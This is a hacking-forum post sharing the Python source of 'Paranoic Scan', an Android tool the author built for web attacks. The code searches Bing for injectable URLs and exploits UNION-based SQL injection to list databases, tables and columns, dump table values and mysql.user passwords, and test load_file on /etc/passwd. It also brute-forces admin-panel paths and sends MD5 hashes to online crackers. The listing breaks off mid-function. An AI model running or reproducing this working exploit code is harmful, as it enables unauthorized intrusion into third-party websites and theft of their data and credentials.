EvilZone
Programming and Scripting => Scripting Languages => : Doddy February 03, 2014, 02:21:56 PM
-
A simple script in python for android, which I use on my tablet, the script has the following functions:
- Bing Scanner to find SQLI
- A complete scanner SQLI
- Search admin panel
- MD5 encoder
- Encoder & Decoder Base64 and Hex
- Locator IP and DNS
- Crack MD5 hashes
- HTTP FingerPrinting
Some pictures:
(http://doddyhackman.webcindario.com/images/parandroid_1.png)
(http://doddyhackman.webcindario.com/images/parandroid_2.png)
(http://doddyhackman.webcindario.com/images/parandroid_3.png)
(http://doddyhackman.webcindario.com/images/parandroid_4.png)
(http://doddyhackman.webcindario.com/images/parandroid_5.png)
(http://doddyhackman.webcindario.com/images/parandroid_6.png)
(http://doddyhackman.webcindario.com/images/parandroid_7.png)
(http://doddyhackman.webcindario.com/images/parandroid_8.png)
(http://doddyhackman.webcindario.com/images/parandroid_9.png)
(http://doddyhackman.webcindario.com/images/parandroid_10.png)
(http://doddyhackman.webcindario.com/images/parandroid_11.png)
The source :
#!usr/bin/python
# -*- coding: utf-8 -*-
#################################################################################
#This software is Copyright (c) 2014 by Doddy Hackman.
#
#This is free software, licensed under:
#
# The Artistic License 1.0
#
#The Artistic License
#
#Preamble
#
#The intent of this document is to state the conditions under which a Package
#may be copied, such that the Copyright Holder maintains some semblance of
#artistic control over the development of the package, while giving the users of
#the package the right to use and distribute the Package in a more-or-less
#customary fashion, plus the right to make reasonable modifications.
#
#Definitions:
#
# - "Package" refers to the collection of files distributed by the Copyright
# Holder, and derivatives of that collection of files created through
# textual modification.
# - "Standard Version" refers to such a Package if it has not been modified,
# or has been modified in accordance with the wishes of the Copyright
# Holder.
# - "Copyright Holder" is whoever is named in the copyright or copyrights for
# the package.
# - "You" is you, if you're thinking about copying or distributing this Package.
# - "Reasonable copying fee" is whatever you can justify on the basis of media
# cost, duplication charges, time of people involved, and so on. (You will
# not be required to justify it to the Copyright Holder, but only to the
# computing community at large as a market that must bear the fee.)
# - "Freely Available" means that no fee is charged for the item itself, though
# there may be fees involved in handling the item. It also means that
# recipients of the item may redistribute it under the same conditions they
# received it.
#
#1. You may make and give away verbatim copies of the source form of the
#Standard Version of this Package without restriction, provided that you
#duplicate all of the original copyright notices and associated disclaimers.
#
#2. You may apply bug fixes, portability fixes and other modifications derived
#from the Public Domain or from the Copyright Holder. A Package modified in such
#a way shall still be considered the Standard Version.
#
#3. You may otherwise modify your copy of this Package in any way, provided that
#you insert a prominent notice in each changed file stating how and when you
#changed that file, and provided that you do at least ONE of the following:
#
# a) place your modifications in the Public Domain or otherwise make them
# Freely Available, such as by posting said modifications to Usenet or an
# equivalent medium, or placing the modifications on a major archive site
# such as ftp.uu.net, or by allowing the Copyright Holder to include your
# modifications in the Standard Version of the Package.
#
# b) use the modified Package only within your corporation or organization.
#
# c) rename any non-standard executables so the names do not conflict with
# standard executables, which must also be provided, and provide a separate
# manual page for each non-standard executable that clearly documents how it
# differs from the Standard Version.
#
# d) make other distribution arrangements with the Copyright Holder.
#
#4. You may distribute the programs of this Package in object code or executable
#form, provided that you do at least ONE of the following:
#
# a) distribute a Standard Version of the executables and library files,
# together with instructions (in the manual page or equivalent) on where to
# get the Standard Version.
#
# b) accompany the distribution with the machine-readable source of the Package
# with your modifications.
#
# c) accompany any non-standard executables with their corresponding Standard
# Version executables, giving the non-standard executables non-standard
# names, and clearly documenting the differences in manual pages (or
# equivalent), together with instructions on where to get the Standard
# Version.
#
# d) make other distribution arrangements with the Copyright Holder.
#
#5. You may charge a reasonable copying fee for any distribution of this
#Package. You may charge any fee you choose for support of this Package. You
#may not charge a fee for this Package itself. However, you may distribute this
#Package in aggregate with other (possibly commercial) programs as part of a
#larger (possibly commercial) software distribution provided that you do not
#advertise this Package as a product of your own.
#
#6. The scripts and library files supplied as input to or produced as output
#from the programs of this Package do not automatically fall under the copyright
#of this Package, but belong to whomever generated them, and may be sold
#commercially, and may be aggregated with this Package.
#
#7. C or perl subroutines supplied by you and linked into this Package shall not
#be considered part of this Package.
#
#8. The name of the Copyright Holder may not be used to endorse or promote
#products derived from this software without specific prior written permission.
#
#9. THIS PACKAGE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR IMPLIED
#WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF
#MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
#
#The End
#
#################################################################################
#Paranoic Scan 0.3
#Android Version
#(C) Doddy Hackman 2014
#################################################################################
import android,urllib2,socket,binascii,re,base64,hashlib
webvul = ""
# Functions
def hexencoder(texto):
return "[+] Result : "+"0x"+str(binascii.hexlify(texto))
def hexdecoder(texto):
text = re.sub("0x","",texto)
return "[+] Result : "+binascii.unhexlify(text)
def base64encoder(texto):
return "[+] Result : "+base64.b64encode(texto)
def base64decoder(texto):
return "[+] Result : "+base64.b64decode(texto)
def md5encoder(texto):
return "[+] Result : "+hashlib.md5(texto).hexdigest()
def reem(texto,parte):
return re.sub(parte,"hackman",texto)
def regexver(code):
if (re.findall("K0BRA(.*?)K0BRA",code)):
return True
else:
return False
def regexdar(code):
if (re.findall("K0BRA(.*?)K0BRA",code)):
return re.findall("K0BRA(.*?)K0BRA",code)[0]
def toma(web) :
nave = urllib2.Request(web)
nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
op = urllib2.build_opener()
return op.open(nave).read()
def tomar(web,vars) :
nave = urllib2.build_opener()
nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]
return nave.open(web,vars).read()
def getdata(web) :
nave = urllib2.Request(web)
nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
op = urllib2.build_opener()
return op.open(nave).info()
def bypass(bypass):
if bypass == "--":
return("+","--")
elif bypass == "/*":
return("/**/","/**/")
else:
return("+","--")
def showtables(web):
pass1,pass2 = bypass("--")
respuesta = ""
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
respuesta = respuesta + "[+] Searching tables ...\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
respuesta = respuesta + "[+] Tables Found : "+numbers+"\n\n"
for counter in range(17,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
table = re.findall("K0BRA(.*?)K0BRA",code2)
table = table[0]
respuesta = respuesta + "[Table Found] : "+table+"\n"
else:
respuesta = respuesta + "[-] Not Found\n"
respuesta = respuesta + "\n[+] Finished"
return respuesta
def showcolumns(web,tabla):
respuesta = ""
pass1,pass2 = bypass("--")
tabla2 = tabla
tabla = "0x"+str(binascii.hexlify(tabla))
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
respuesta = respuesta + "[+] Searching columns ...\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
respuesta = respuesta + "[+] Columns Found : "+numbers+"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
column = re.findall("K0BRA(.*?)K0BRA",code2)
column = column[0]
respuesta = respuesta + "\n[Column Found in table "+str(tabla2)+"] : "+str(column)
else:
respuesta = respuesta + "[-] Not Found"
respuesta = respuesta + "\n\n[+] Finished"
return respuesta
def showdbs(web):
respuesta = ""
pass1,pass2 = bypass("--")
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
respuesta = respuesta + "[+] Searching DBS ...\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
respuesta = respuesta + "[+] DBS Found : "+numbers+"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
db = re.findall("K0BRA(.*?)K0BRA",code2)
db = db[0]
respuesta = respuesta + "\n[DB Found] : "+db
else:
respuesta = respuesta + "[-] Not Found"
respuesta = respuesta + "\n\n[+] Finished"
return respuesta
def dumper(web,table,col1,col2):
respuesta = ""
pass1,pass2 = bypass("--")
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
code1 = toma(web1+pass1+"from"+pass1+table+pass2)
respuesta = respuesta + "[+] Searching values ...\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
respuesta = respuesta + "[+] Values Found : "+numbers+"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
c1 = re.findall("K0BRA(.*?)K0BRA",code2)
c1 = c1[0]
c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
c2 = c2[0]
respuesta = respuesta + "\n["+col1+"] : "+c1+"\n"
respuesta = respuesta + "["+col2+"] : "+c2+"\n"
else:
respuesta = respuesta + "[-] Not Found\n"
respuesta = respuesta + "\n[+] Finished"
return respuesta
def mysqluser(web):
pass1,pass2 = bypass("--")
respuesta = ""
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
respuesta = respuesta + "[+] Searching mysql.user ...\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
respuesta = respuesta + "[+] Users Found : "+numbers+"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
host = re.findall("K0BRA(.*?)K0BRA",code2)
host = host[0]
user = re.findall("K0BRA1(.*?)K0BRA1",code2)
user = user[0]
passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
passw = passw[0]
respuesta = respuesta + "\n[Host] : "+host
respuesta = respuesta + "\n[User] : "+user
respuesta = respuesta + "\n[Pass] : "+passw+"\n"
else:
respuesta = respuesta + "[-] Not Found\n"
respuesta = respuesta + "\n[+] Finished"
return respuesta
def showcolumnsdb(web,db,table):
respuesta = ""
db2 = db
table2 = table
db = "0x"+str(binascii.hexlify(db))
table = "0x"+str(binascii.hexlify(table))
pass1,pass2 = bypass("--")
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
respuesta = respuesta + "[+] Searching columns in DB ...\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
respuesta = respuesta + "\n[+] Columns Found : "+str(numbers)+"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
column = re.findall("K0BRA(.*?)K0BRA",code2)
column = column[0]
respuesta = respuesta + "\n[Column Found] : "+str(column)
else:
respuesta = respuesta + "\n[-] Not Found"
respuesta = respuesta + "\n\n[+] Finished"
return respuesta
def showtablesdb(web,db):
respuesta = ""
db2 = db
db = "0x"+str(binascii.hexlify(db))
pass1,pass2 = bypass("--")
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
respuesta = respuesta + "[+] Searching tables in DB ...\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
respuesta = respuesta + "[+] Tables Found : "+str(numbers)+"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
table = re.findall("K0BRA(.*?)K0BRA",code2)
table = table[0]
respuesta = respuesta + "\n[Table Found] : "+table
else:
respuesta = respuesta + "[-] Not Found"
respuesta = respuesta + "\n\n[+] Finished"
return respuesta
def more(web):
respuesta = ""
pass1,pass2 = bypass("--")
otraweb = web
respuesta = respuesta + "[+] Searching DB Details ...\n"
hextest = "0x2f6574632f706173737764"
web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb)
code0 = toma(web1+pass2)
if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
datar = re.split("K0BRA",datax[0])
respuesta = respuesta + "\n[+] Username : "+datar[1]
respuesta = respuesta + "\n[+] Database : "+datar[2]
respuesta = respuesta + "\n[+] Version : "+datar[3]+"\n"
code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
if (re.findall("K0BRA",code1)):
respuesta = respuesta + "\n[+] mysql.user : on"
code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
if (re.findall("K0BRA",code2)):
respuesta = respuesta + "\n[+] information_schema.tables : on"
codetres = toma(web2)
if (re.findall("ERTOR854",codetres)):
respuesta = respuesta + "\n[+] load_file() : on"
respuesta = respuesta + "\n\n[+] Finished"
return respuesta
def httpfinger(target):
respuesta = ""
try:
respuesta = respuesta + str(getdata(target))
except:
respuesta = respuesta + "[-] Error"
return respuesta
def scanpanel(web):
contador = 0
panels=['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
respuesta = ""
respuesta = respuesta + "[+] Scanning ...\n"
for path in panels:
try:
toma(web+"/"+path)
respuesta = respuesta + "\n[+] Link : "+web+"/"+path
contador = contador + 1
except urllib2.URLError, e:
pass
if(contador==0) :
respuesta = respuesta + "\n[+] Not Found"
respuesta = respuesta + "\n\n[+] Finished"
return respuesta
def crackmd5(md5) :
respuesta = ""
code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
if (re.findall("<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>",code)):
rex = re.findall("<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>",code)
return "[+] Hash : "+rex[0][1]
else:
code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")
if (re.findall("Decrypted Text: <\/b>(.*?)<\/font>",code)):
rex = re.findall("Decrypted Text: <\/b>(.*?)<\/font>",code)
return "[+] Hash : "+rex[0]
else:
code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)
if (re.findall("<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>",code)):
rex = re.findall("<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>",code)
return "[+] Hash : "+rex[0]
else:
return "[+] Hash : Not Found"
return respuesta
def locateip(pagina):
respuesta = ""
ip = socket.gethostbyname(str(pagina))
code = toma("http://www.melissadata.com/lookups/iplocation.asp?ipaddress="+ip)
respuesta = respuesta + "[++] IP Address Location\n"
if (re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
rex = re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
city = rex[0][1]
respuesta = respuesta + "\n[++] City : "+city
else:
respuesta = respuesta + "\n[++] City : Not Found"
if (re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
rex = re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
country = rex[0][1]
respuesta = respuesta + "\n[++] Country : "+country
else:
respuesta = respuesta + "\n[++] Country : Not Found"
if (re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
rex = re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
state = rex[0][1]
respuesta = respuesta + "\n[++] State : "+state
else:
respuesta = respuesta + "\n[++] State : Not Found"
code = toma("http://www.ip-adress.com/reverse_ip/"+ip)
if (re.findall("whois\/(.*?)\">Whois",code)):
rex = re.findall("whois\/(.*?)\">Whois",code)
respuesta = respuesta + "\n\n[++] DNS Founds\n"
for dns in rex:
respuesta = respuesta + "\n[+] "+dns
return respuesta
def sqltest(webs):
respuesta = ""
for web in webs :
if re.findall("=",web):
web = re.split("=",web)
web = web[0]+"="
try:
code = toma(web+"-1+union+select+1--")
if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
respuesta = respuesta + "[SQLI] : "+web+"\n"
except:
pass
return respuesta
def limpiar(pag):
limpia = []
for p in pag:
if p not in limpia:
limpia.append(p)
return limpia
def bingscan(dork,count):
respuesta = ""
pag = []
s = 10
while s <= int(count):
try:
code = toma("http://www.bing.com/search?q="+str(dork)+"&first="+str(s))
d = re.findall("<h3><a href=\"(.*?)\"",code,re.I)
s += 10
for a in d:
pag.append(a)
except:
pass
pag = limpiar(pag)
return pag
##
aplicacion = android.Android()
def menuencoder():
aplicacion.dialogCreateAlert("Encoders")
aplicacion.dialogSetItems(["MD5 Encoder","Base64 Encoder","Base64 Decoder","Hex Encoder","Hex Decoder","Exit"])
aplicacion.dialogShow()
reh = aplicacion.dialogGetResponse().result
reb = reh["item"]
if reb==0:
aplicacion.dialogCreateAlert("MD5 Encoder")
aplicacion.dialogGetInput("MD5 Encoder","Enter Text")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menuencoder()
else:
texto = ref['value']
aplicacion.dialogCreateSpinnerProgress("MD5 Encoder","[+] Encoding ...")
aplicacion.dialogShow()
don = md5encoder(texto)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("MD5 Encoder",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menuencoder()
if reb==1 :
aplicacion.dialogCreateAlert("Base64 Encoder")
aplicacion.dialogGetInput("Base64 Encoder","Enter Text")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menuencoder()
else:
texto = ref['value']
aplicacion.dialogCreateSpinnerProgress("Base64 Encoder","[+] Encoding ...")
aplicacion.dialogShow()
don = base64encoder(texto)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("Base64 Encoder",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menuencoder()
if reb==2 :
aplicacion.dialogCreateAlert("Base64 Decoder")
aplicacion.dialogGetInput("Base64 Decoder","Enter Text")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menuencoder()
else:
texto = ref['value']
aplicacion.dialogCreateSpinnerProgress("Base64 Decoder","[+] Encoding ...")
aplicacion.dialogShow()
don = base64decoder(texto)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("Base64 Decoder",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menuencoder()
if reb==3 :
aplicacion.dialogCreateAlert("Hex Encoder")
aplicacion.dialogGetInput("Hex Encoder","Enter Text")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menuencoder()
else:
texto = ref['value']
aplicacion.dialogCreateSpinnerProgress("Hex Encoder","[+] Encoding ...")
aplicacion.dialogShow()
don = hexencoder(texto)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("Hex Encoder",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menuencoder()
if reb==4 :
aplicacion.dialogCreateAlert("Hex Decoder")
aplicacion.dialogGetInput("Hex Decoder","Enter Text")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menuencoder()
else:
texto = ref['value']
aplicacion.dialogCreateSpinnerProgress("Hex Decoder","[+] Encoding ...")
aplicacion.dialogShow()
don = hexdecoder(texto)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("Hex Decoder",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menuencoder()
if reb==5:
menu()
def menusql():
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogSetItems(["Get Tables","Get Columns","Get Databases","Get Tables of DB","Get Columns of DB","Get mysql.users","Get Details DB","Dump Values","Exit"])
aplicacion.dialogShow()
reez = aplicacion.dialogGetResponse().result
opsql = reez["item"]
if opsql==0:
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Tables ...")
aplicacion.dialogShow()
don = showtables(webvul)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menusql()
if opsql==1 :
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menusql()
else:
tabla = ref['value']
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Columns ...")
aplicacion.dialogShow()
don = showcolumns(webvul,tabla)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menusql()
if opsql==2 :
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Databases ...")
aplicacion.dialogShow()
don = showdbs(webvul)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menusql()
if opsql==3 :
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogGetInput("SQLI Scanner","Enter DB Name")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menusql()
else:
db = ref['value']
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Tables of DB ...")
aplicacion.dialogShow()
don = showtablesdb(webvul,db)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menusql()
if opsql==4 :
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogGetInput("SQLI Scanner","Enter DB Name")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menusql()
else:
db = ref['value']
aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menusql()
else:
tabla = ref['value']
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Columns of DB ...")
aplicacion.dialogShow()
don = showcolumnsdb(webvul,db,tabla)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menusql()
if opsql==5 :
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching mysql.users ...")
aplicacion.dialogShow()
don = mysqluser(webvul)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
